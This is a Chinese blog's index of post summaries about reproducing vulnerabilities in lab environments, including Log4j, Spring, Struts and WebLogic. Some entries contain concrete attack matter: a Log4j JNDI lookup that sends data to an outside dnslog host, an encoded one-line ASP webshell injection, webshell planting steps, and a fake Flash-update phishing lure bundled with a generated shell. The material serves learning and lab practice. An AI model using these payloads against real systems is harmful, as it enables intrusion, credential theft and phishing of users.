自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(34)
  • 收藏
  • 关注

原创 IIS RCE-CVE-2017-7269

Microsoft windows Server 2003 R2中的 Interne信息服务IIS6.0中的 WebDAV服务中的 ScStoragePathFromUrl函数中的缓冲区溢出允许远程攻击者通过以 If。

2024-08-07 20:58:56 291

原创 IIS6 PUT漏洞

IIS Server 在 Web 服务扩展中开启了 WebDAV ,配置了可以写⼊的权限,造成任意⽂件上传。

2024-08-07 20:26:42 452

原创 spring 代码执⾏ (CVE-2018-1273)漏洞

Spring Data 是⼀个⽤于简化数据库访问,并⽀持云服务的开源框架,Spring Data Commons 是 Spring Data 下所有⼦项⽬共享的基础框架。Spring Data Commons 在 2.0.5 及 以前版本中,存在⼀处 SpEL 表达式注⼊漏洞,攻击者可以注⼊恶意 SpEL 表达式以执⾏任意命令。

2024-08-07 19:37:25 564

原创 Shiro rememberMe反序列化漏洞(Shiro-550)

Apache Shiro是⼀个强⼤易⽤的Java安全框架,提供了认证、授权、加密和会话管理等功 能。Shiro框架直观、易⽤,同时也能提供健壮的安全性。

2024-08-07 19:26:08 337

原创 Spring Data Rest 远程命令执⾏命令(CVE-2017-8046)

Spring是Java EE编程领域的⼀个轻量级开源框架,该框架由⼀个叫Rod Johnson的程序员 在2002年最早提出并随后创建,是为了解决企业级编程开发中的复杂性,业务逻辑层和其他各 层的松耦合问题,因此它将⾯向接⼝的编程思想贯穿整个系统应⽤,实现敏捷开发的应⽤型框 架。框架的主要优势之⼀就是其分层架构,分层架构允许使⽤者选择使⽤哪⼀个组件,同时为 J2EE应⽤程序开发提供集成的框架。

2024-08-07 19:08:48 559

原创 struts S2-057远程执⾏代码漏洞

漏洞产⽣于⽹站配置XML时如果没有设置namespace的值,并且上层动作配置中并没有设置 或使⽤通配符namespace时,可能会导致远程代码执⾏漏洞的发⽣。同样也可能因为url标签没 有设置value和action的值,并且上层动作并没有设置或使⽤通配符namespace,从⽽导致远程 代码执⾏漏洞的发⽣。

2024-08-07 18:41:27 1104

原创 Thinkphp5x远程执行命令及getshell

靶场:vulhub/thinkphp/5-rcedocker-compose up -d #启动环境。

2024-08-07 18:27:39 797

原创 未授权访问漏洞

运行后,访问http://your-ip:8888,将看到Jupyter Notebook的Web管理界面,并没有要求填写密码。

2024-08-06 20:48:16 888

原创 Jboss 漏洞

访问/invoker/JMXInvokerServlet开启下载存在漏洞二.CVE-2017-7504。

2024-08-06 20:39:42 144

原创 Weblogic 漏洞(详细)

访问一下默认用户名:weblogic 密码: Oracle@123然后点击安装然后再点击上传文件将jsp木马打包,改为war上传一直下一步,最后点完成 然后使用工具连接。

2024-08-06 20:07:18 456

原创 Tomcat 漏洞

1.使用burp抓包 把get改成putjsp文件后加/添加完成后访问 木马然后木马的网址 在哥斯拉测试并且添加添加成功 然后我们就成功进去啦、

2024-08-06 18:04:53 1004

原创 vulhub靶场之wordpress关卡(保姆级教程)

1.选择简体中文 然后添加信息 点击安装wordpress1.2 登陆后台1.3 在后台修改模板1.4 找一个php文件,在最开头加入一句话木马点击更新 然后访问默认模板路径 下面的是默认的模板路径然后复制网址 使用工具连接。

2024-08-04 01:02:46 260

原创 Pageadmin 漏洞教程

这个就是我们生成的asp木马不能直接上传 压缩为zip文件。

2024-08-03 22:29:48 216

原创 phpMyAdmin 漏洞复现教程

然后我们更改日志保存路径然后查看是否更改成功 显示 更改成功然后我们插入一句话木马访问一下木马然后使用工具连接。

2024-08-03 21:46:55 622

原创 ASPCMS 漏洞详细教程

将slideTextStatus的值修改为1%25><%25Eval(Request(chr(65)))25><%25 放包(连接密码是a)然后用工具连接 成功连接。

2024-08-03 21:11:12 414

原创 DeDeCMS漏洞

我们写一个一句话木马然后上传访问他 然后复制网址用工具连接连接成功。

2024-08-03 20:32:10 218

原创 业务逻辑支付漏洞靶场复现dami niu cmseasy(保姆教程)

在CmsEasy7.6.3.2版本中,存在订单金额任意修改逻辑漏洞,攻击者利用业务逻辑层的应用安全问题,在提交订单时抓取数据包并修改,以及对订单的数量进行任意修改(打到资本家!此漏洞可能造成企业的资产损失和名誉受损,传统的安全防御设备和措施收效甚微,危害还是比较大的捏。

2024-08-02 17:17:59 751 2

原创 反序列化靶机实战serial(保姆级教程)

反序列靶机教程 详细

2024-08-01 20:08:14 1380 1

原创 log4j2远程执行代码CVE-2021-44228复现

可以看到有三个服务,看到熟悉的rmi和ldap ,实际上这个jar的作用就是帮我们生成了恶意代码类,并且生成了对应的url,然后我们就可以回到刚才的网站去进行JNDI注入 另外开启监听。上传参数 solr/admin/cores?action=${jndi:ldap://${sys:java.version}.jxmxiy.dnslog.cn 获得java版本号。发现 /solr/admin/cores?action=参数 可以上传 如下图。下载JDNI,放到攻击机,输入如下命令。开始准备反弹shell。

2024-07-31 20:01:38 299

原创 申瓯通信设备有限公司在线录音管理系统(复现过程)

申瓯通信设备有限公司在线录音管理系统 index.php接口处存在任意文件读取漏洞,恶意攻击者可能利用该漏洞读取服务器上的敏感文件,例如客户记录、财务数据或源代码,导致数据泄露。

2024-07-31 19:11:13 551

原创 文件解析漏洞(教程)

文件解析漏洞

2024-07-30 18:58:16 731

原创 BugkuCTF Web篇

Bug ku CTF web篇

2024-07-30 18:28:53 2020

原创 Tomato 靶机(详细教程)

Tomato 靶机教程

2024-07-29 19:36:20 455

原创 hackmea靶机(保姆级教程)

Hackmea靶机教程

2024-07-29 19:19:27 395

原创 AI web 1.0靶机复现教程

1.靶机地址 192.168.133.166 直接打开网页 什么也没有。

2024-07-29 18:59:57 689

原创 xss-labs 靶场

使用集成环境phpstudy。下载后,直接解压到网站的根目录下就可以直接运行了!二.教程。

2024-07-28 20:47:08 178

原创 upload-labs-靶场(1-19关详细解答 保姆级教程)

下载 upload-labs-mster靶场 创建一个upload目录 不然无法打开upload-labs 靶场1.我们先上传一个 php后缀文件 显示我们该文件不允许上传 只能上传 jpg png gif的文件后缀2.我们可以上传 自己写的php 后缀改成jpg上传 然后抓包 可以看到 数据上传了 我们可以在burpsuite里修改一下后缀 改成php后缀 这样我们自己写的php就上传成功了我们发现 我们的php文件上传成功了然后在上传到的图片鼠标右键新建标签页打开图片 就上传成功了。

2024-07-26 17:31:09 1353

原创 XXE -靶机

XXE靶机。

2024-07-25 18:07:24 608

原创 CTFHub SSRF(1--11大全教程)

CTFHub ssrf

2024-07-24 19:50:47 1112

原创 xss平台获取管理员cookie

xss cookie获取

2024-07-23 20:04:27 205

原创 xss--flash钓鱼

四 新建一个1.js文件 然后在xss平台找到flash弹窗钓鱼 然后查看他的源代码 复制到新建的1.js里面。五.然后在kali里使用msf命令生成shell木马 如下图。当我们安装 上面解压好的那个flash的时候 这里就会显示。三.下载完成把网站部署在phpstudy www根目录下。七.把flash 安装包跟shell.exe一起压缩。六.把shell拖到自己主机桌面 或者根目录下。一.本机下载小皮面板 开启环境。然后在1.js里修改成伪造网站的ip。二.下载flash源文件。

2024-07-23 19:26:23 416

原创 永恒之黑漏洞实验报告

永恒之黑漏洞整个过程

2024-07-22 20:21:42 1193 1

原创 Sqli-labs1~75关 通关详解

sqli—labs通关攻略

2024-07-22 19:36:47 648

原创 墨者学院(4个sql靶场攻略)

墨者学院 4种sql注入漏洞的解答 简单易理解 不复杂

2024-07-22 18:51:06 1889 1

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除